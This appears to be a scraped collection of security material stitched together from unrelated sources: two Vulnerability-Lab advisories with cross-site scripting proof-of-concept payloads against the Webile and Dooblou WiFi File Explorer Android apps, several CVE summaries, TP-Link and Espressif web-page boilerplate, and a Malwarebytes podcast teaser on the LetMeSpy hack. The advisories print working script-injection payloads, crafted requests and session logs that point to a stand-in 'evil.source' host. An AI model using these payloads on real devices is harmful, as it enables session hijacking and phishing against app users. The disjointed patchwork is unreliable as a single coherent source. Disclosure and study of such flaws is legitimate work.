A vulnerability was found in Dooblou WiFi File Explorer 1.13.3. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument search/order/download/mode leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235051.

CVE-2023-3784

Webile version 1.0.1 suffers from multiple cross site scripting vulnerabilities.

    Document Title:===============Webile v1.0.1 - Multiple Cross Site Web VulnerabilitiesReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2321Release Date:=============2023-07-03Vulnerability Laboratory ID (VL-ID):====================================2321Common Vulnerability Scoring System:====================================5.5Vulnerability Class:====================Cross Site Scripting - PersistentCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-10-11: Researcher Notification & Coordination (Security Researcher)2022-10-12: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2023-07-03: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (Guest Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application.The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser toweb-application requests from the application-side.The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own maliciousscript codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content.Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicioussource and persistent manipulation of affected application modules.Request Method(s):[+] POSTVulnerable Parameter(s):[+] new_file_name[+] iProof of Concept (PoC):=======================The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.Vulnerable Source: SendSend message to phone listing<div class="layui-colla-item"><div class="layui-card-header">Message</div><div class="layui-colla-content" style="display:block;padding-left:16px;"><div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;"  title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br><span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div></div></div></div>history logs messages<table class="layui-table layui-form"><thead><tr><th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center"><input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th><th style="border-right-width:1px;">Message</th><th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th><th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr></thead><tbody><tr><td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center"><input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></td><td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td><td align="center">2022/07/17 20:10</td><td class="td-manage" style="border-right-width:1px;text-align:center;"><a title="Copy" onclick="copy(3)" href="javascript:;"><i class="iconfont">&nbsp;&nbsp;</i></a><a title="Delete" onclick="deleteLog(this,3)" href="javascript:;"><i class="layui-icon">&nbsp;&nbsp;</i></a></td></tr></tbody></table>--- PoC Session Logs #1 (POST) ---  (Add)http://localhost:8080/file_actionHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 210Origin:http://localhost:8080Connection: keep-aliveReferer:http://localhost:8080/webile_filesCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}-POST: HTTP/1.1 200 OKContent-Type: application/jsonConnection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked-http://localhost:8080/evil.sourceHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8080/webile_filesCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 0-Cookie:treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6--- PoC Session Logs #2 (POST) ---  (Send)http://localhost:8080/sendHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 180Origin:http://localhost:8080Connection: keep-aliveReferer:http://localhost:8080/webile_sendCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}-POST: HTTP/1.1 200 OKContent-Type: application/jsonConnection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked-http://localhost:8080/evil.sourceHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8080/webile_sendCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: application/octet-streamDate: Sun, 17 Jul 2022 18:08:33 GMTConnection: keep-aliveContent-Length: 0Security Risk:==============The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Webile 1.0.1 Cross Site Scripting

Dooblou WiFi File Explorer version 1.13.3 suffers from multiple cross site scripting vulnerabilities.

    Document Title:===============Dooblou WiFi File Explorer 1.13.3 - Multiple VulnerabilitiesReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2317Release Date:=============2023-07-04Vulnerability Laboratory ID (VL-ID):====================================2317Common Vulnerability Scoring System:====================================5.1Vulnerability Class:====================MultipleCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection.No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.Affected Product(s):====================Product Owner: dooblouProduct: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application)Vulnerability Disclosure Timeline:==================================2022-01-19: Researcher Notification & Coordination (Security Researcher)2022-01-20: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2023-07-04: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (Guest Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================Multiple input validation web vulnerabilities has been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-applicationrequests from the application-side.The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecure validatedand executes malicious script codes. The attack vector is non-persistent and the rquest method to inject is get. Attacker do not need to be authorized toperform an attack to execute malicious script codes. The links can be included as malformed upload for example to provoke an execute bby a view of thefront- & backend of the wifi explorer.Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicioussource and non-persistent manipulation of affected application modules.Proof of Concept (PoC):=======================The input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a>http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEXVulnerable Sources: Execution Points<table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><tdstyle="vertical-align:top;"><table style="background-color: #FFA81E;background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);background-repeat: repeat-x; background-position:top;" width="700"cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><spanclass="doob_large_text">ERROR</span></center></td></tr></tbody></table><br><table style="background-color: #B2B2B2; background-image:url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><span class="doob_medium_text">Cannot find file ordirectory! /storage/emulated/0/Download/<a href="https://evil.source"  onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURNINDEX</a></span></td></tr></tbody></table><br><span class="doob_medium_text"><span class="doob_link">&nbsp;&nbsp;<ahref="/">>>&nbsp;Back ToFiles&nbsp;>></a></span></span><br></td></tr></tbody></table><br>-<li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr><td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST"><input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td><table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space:nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;</span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I-<td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();">&nbsp;&nbsp;<a class="doob_button"href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source"  onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();"style="">Download</a>&nbsp;<a class="doob_button" href="javascript:setMultiSelectConfirm('Are  you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action','13&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>&nbsp;<a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy","/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source"  onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();'style="">Create Copy</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td><td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img"title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style:none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=38&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img"title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;</span></td></tr></table>---PoC Session Logs ---http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xmlHost: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3EGET: HTTP/1.1 200 OKCache-Control: no-cacheContent-Type: text/xml-http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0Upgrade-Insecure-Requests: 1GET: HTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidateContent-Type: text/html-http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xmlHost: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source"  onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3EGET: HTTP/1.1 200 OKCache-Control: no-cacheContent-Type: text/xmlSecurity Risk:==============The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application are estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Dooblou WiFi File Explorer 1.13.3 Cross Site Scripting

TP-LINK Archer C50v2 Archer C50(US)_V2_160801, TP-LINK Archer C20v1 Archer_C20_V1_150707, and TP-LINK Archer C2v1 Archer_C2_US__V1_170228 were discovered to contain a buffer overflow which may lead to a Denial of Service (DoS) when parsing crafted data.

**Utility**

USB\_Printer\_Controller\_Utility\_Mac

Download

Published Date: 2022-02-21

Language: English

File Size: 1.75 MB

Operating System: Mac OS 10.15/11.x/12.x

USB\_Printer\_Controller\_Utility\_Mac

Download

Published Date: 2018-10-29

Language: English

File Size: 2.53 MB

Operating System: Mac OS 10.9-10.14

USB\_Printer\_Controller\_Utility\_Windows

Download

Published Date: 2016-11-18

Language: English

File Size: 9.62 MB

Operating System: WinXP/Vista/7/8/8.1/10

Archer C2\_V1\_Easy Setup Assistant\_140218

Download

Published Date: 2014-02-18

Language: English

File Size: 6.78 MB

Operating System: WinXP/Vista/7/8

**Setup Video**

*   **How to Resolve Double NAT using Starlink**
*   **How to Configure a TP-Link Router with Starlink**
*   **How to Set up Address Reservation on TP-Link Routers Windows**
    
    This video will show you how to set up Address Reservation on TP-Link routers.
    
    More Fold
    
*   **How to Set up OpenVPN on TP-Link Routers Windows**
    
    This video will show you how to set up OpenVPN on a TP-Link Wi-Fi router. For more information, visit www.tp-link.com/support.
    
    More Fold
    
*   **What should I do if I cannot access the internet? - Using a DSL modem and a TP-Link router**
    
    If you can’t access the internet using a DSL modem and TP-Link router, this video can help you solve the problem.
    
    More Fold
    
*   **What should I do if I cannot access the internet? - Using a cable modem and a TP-Link router**
    
    If you can’t access the internet using a cable modem and TP-Link router, follow this video step by step to solve your problem.
    
    More Fold
    
*   **How to turn a router into an Access Point?**
*   **How to set up Port Forwarding on a TP-Link router**
    
    Take Archer A7 as demonstration.
    
    More Fold
    
*   **How to set Parental Controls on a TP-Link router**
    
    Take Archer A9 as demonstration.
    
    More Fold
    
*   **How to change the Wi-Fi settings on TP-Link router**

**Firmware**

A firmware update can resolve issues that the previous firmware version may have and improve its current performance.

**To Upgrade**

**IMPORTANT:** To prevent upgrade failures, please read the following before proceeding with the upgrade process

*   **Please upgrade firmware from the local TP-Link official website of the purchase location for your TP-Link device, otherwise it will be against the warranty. Please click here to change site if necessary.**
*   Please verify the hardware version of your device for the firmware version. Wrong firmware upgrade may damage your device and void the warranty. (**Normally Vx.0=Vx.6/Vx.8 (eg:V1.0=V1.6/V1.8);   Vx.x0=Vx.x6/Vx.x8 (eg:V1.20=V1.26/V1.28)**  
    How to find the hardware version on a TP-Link device
*   **Do NOT turn off the power during the upgrade process, as it may cause permanent damage to the product.**
*   To avoid wireless disconnect issue during firmware upgrade process, it's recommended to upload firmware with wired connection unless there is no LAN/Ethernet port on your TP-Link device.
*   It's recommended that users stop all Internet applications on the computer, or simply disconnect Internet line from the device before the upgrade.
*   Use decompression software such as WinZIP or WinRAR to extract the file you download before the upgrade.

More Fold

Archer C2(US)\_V1\_170228

Download

Published Date: 2017-02-28

Language: English

File Size: 6.69 MB

Modifications and Bug Fixes:

New Features/Enhancement:  
Optimized the security mechanism.

Bug fixed:  
1\. Fixed the bug that some IPv6 websites can't be accessed in some special scenarios.  
2\. Fixed the bug that the device would be unable to access internet when special IP address and gateway are offered by ISP.

Notes:

1\. For Archer C2(US)\_V1.  
2\. It is NOT suggested to upgrade firmware which is not for your region. If this site is not for your region, please click here to choose your own region and download the most suitable firmware version.

Archer C2(US)\_V1\_160606

Download

Published Date: 2016-06-06

Language: English

File Size: 6.53 MB

Modifications and Bug Fixes:

New Features/Enhancement：  
1\. Added the function to filter the https website.  
2\. Improved the 2.4GHz wireless capability.  
3\. Enhanced the security mechanism.  
4\. Optimized the performance of IPv6 connection.

Bug Fixed：  
1\. Fixed the bug that the the delay is higher than normal when trying to Ping the LAN IP of the device.  
2\. Fixed the bug that the media server would display but fail to use the sharing files even you've already deleted the last folder.  
3\. Fixed the bug that some repeaters may fail to renew IP address normally with it.  
4\. Fixed the bug that PPPoE connection may fail to be connected in some special scenario.

Notes:

1\. For Archer C2(US)\_V1  
2\.  It is NOT suggested to upgrade firmware which is not for your region. If this site is not for your region, please click here to choose your own region and download the most suitable firmware version.

Archer C2(US)\_v1\_160128

Download

Published Date: 2016-01-28

Language: English

File Size: 6.57 MB

Modifications and Bug Fixes:

New Features/Enhancement：  
1\. Added the conflict detection function of DNS and LAN IP.  
2\. Enhance the performance for multicast.   
3\. The switch of DOS won't affect the Ping function of WAN and LAN any more.  
Bug Fixed：  
The LED light would keep flashing if the USB device is unplugged when scanning.

Notes:

1.For Archer C2(US)1.0  
2.If you’re in a region out of United States, please do not upgrade US firmware.Click here to choose your region for the most suitable firmware.

**To Use Third Party Firmware In TP-Link Products**

Some official firmware of TP-Link products can be replaced by the third party firmware such as DD-WRT. TP-Link is not obligated to provide any maintenance or support for it, and does not guarantee the performance and stability of third party firmware. Damage to the product as a result of using third party firmware will void the product's warranty.

**Open Source Code For Programmers (GPL)**

Please note: The products of TP-Link partly contain software code developed by third parties, including software code subject to the GNU General Public Licence (“GPL“), Version 1/Version 2/Version 3 or GNU Lesser General Public License ("LGPL"). You may use the respective software condition to following the GPL licence terms.

You can review, print and download the respective GPL licence terms here. You receive the GPL source codes of the respective software used in TP-Link products for direct download and further information, including a list of TP-Link software that contain GPL software code under GPL Code Center.

The respective programs are distributed WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the respective GNU General Public License for more details.

**Apps**

TP-Link Tether

TP-Link Tether provides the easiest way to access and manage your network with your iOS or Android devices. Learn more about TP-Link Tether and Compatible Devices

Note: To use Tether, please update your TP-Link device's firmware to the latest version.

**Emulators**

Firmware Version

Working Mode

Language

140218

\-

English

Browse

**Note:**

1\.  The emulator is a virtual web GUI where you can experience the TP-Link product management panel.

2\. The listed emulators might not have the latest firmware.

3\.  The features displayed are for reference, and their availability may depend on local regulations. For more information, please refer to the datasheet or product page.

CVE-2023-30383: Download for  Archer C2 | TP-Link

An issue was discovered in the Linux kernel before 6.3.9. ksmbd does not validate the SMB request protocol ID, leading to an out-of-bounds read.

CVE-2023-38430

An issue was discovered on Espressif ESP32 3.0 (ESP32_rev300 ROM) devices. An EMFI attack on ECO3 provides the attacker with a capability to influence the PC value at the CPU context level, regardless of Secure Boot and Flash Encryption status. By using this capability, the attacker can exploit another behavior in the chip to gain unauthorized access to the ROM download mode. Access to ROM download mode may be further exploited to read the encrypted flash content in cleartext format or execute stub code.

**Developer Zone**

**Hardware**

Espressif drives AIoT development with complete MCU based solutions with integrated Wi-Fi and Bluetooth connectivity.

Learn More

**Software**

We offer an easy-to-use and efficient development platform for AIoT applications.

Learn More

**Documents**

View and download Espressif’s technical documents.

Learn More

**At Espressif,** not only do we design powerful AIoT chips, but we also design their operating systems and application frameworks. In doing so, we also support our customers, all the way from design to certification and manufacturing. By choosing us, you get to concentrate on your design, and bring your product to life quickly, efficiently and at no extra cost.

 

**We’re Hiring!**

Espressif is committed to technological innovation for the benefit of both our society and the planet. We are looking for people with a unique blend of creativity, dedication and technological acumen. Join us so we can build an AIoT world together!

Open Positions

**Latest Updates**

*   The Espressif Thread Border Router is now officially recognised as a Thread-...
    
*   CoreS3 is a third-generation device in M5Stack’s Core development kit series,...
    
*   The JRC Board is one of the latest ESP32-based dev boards for IoT development...
    
*   Put together by Magicbit Academy, this Udemy course will teach you how to build...
    
*   Adding Golioth’s device management features to an existing ESP-IDF project is a...
    
*   Espressif Webinars will be launched on 13 Apr., with a presentation on esptools.
    
*   With the help of ESP32-S3, the Plumerai AI software provides masterful deep-...
    
*   Espressif and the National University of Singapore have recently co-organised a...
    
*   Espressif Systems will be an official exhibitor at Embedded World 2023, between...
    
*   Independent maker Philippe Cadic has created a smart watch based on Espressif’s...
    
*   Espressif’s ESP32-C6 is now available on the market. ESP-IDF v5.1, currently in...
    
*   Build your Matter devices with ease using Espressif SoCs (the entire ESP32, and...

CVE-2023-35818: Wi-Fi & Bluetooth MCUs and AIoT Solutions I Espressif Systems

Categories: Podcast
This week on Lock and Code, we speak with maia arson crimew about the hack of the monitoring app LetMeSpy, which many have labeled as stalkerware. 



(Read more...)




The post Spy vs. spy: Exploring the LetMeSpy hack, with maia arson crimew appeared first on Malwarebytes Labs.

The language of a data breach, no matter what company gets hit, is largely the same. There's the stolen data—be it email addresses, credit card numbers, or even medical records. There are the users—unsuspecting, everyday people who, through no fault of their own, mistakenly put their trust into a company, platform, or service to keep their information safe. And there are, of course, the criminals. Some operate in groups. Some act alone. Some steal data as a means of extortion. Others steal it as a point of pride. All of them, it appears, take something that isn't theirs. 

But what happens if a cybercriminal takes something that may have already been stolen? 

In late June, a mobile app that can, without consent, pry into text messages, monitor call logs, and track GPS location history, warned its users that its services had been hacked. Email addresses, telephone numbers, and the content of messages were swiped, but how they were originally collected requires scrutiny. That's because the app itself, called LetMeSpy, is advertised as a parental and employer monitoring app, to be installed on the devices of _other people_ that LetMeSpy users want to track. 

